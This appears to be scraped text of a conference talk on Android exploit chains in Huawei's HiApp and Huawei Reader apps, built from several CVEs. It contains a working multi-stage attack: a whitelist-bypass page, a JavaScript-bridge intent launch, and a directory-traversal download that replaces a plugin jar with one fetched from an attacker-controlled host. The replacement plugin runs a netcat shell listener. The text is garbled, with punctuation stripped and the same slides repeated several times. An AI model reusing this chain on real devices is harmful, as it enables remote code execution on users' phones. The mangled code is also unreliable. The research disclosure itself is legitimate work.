Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 16: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/16.jpg)
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 17: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/17.jpg)
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 18: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/18.jpg)
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
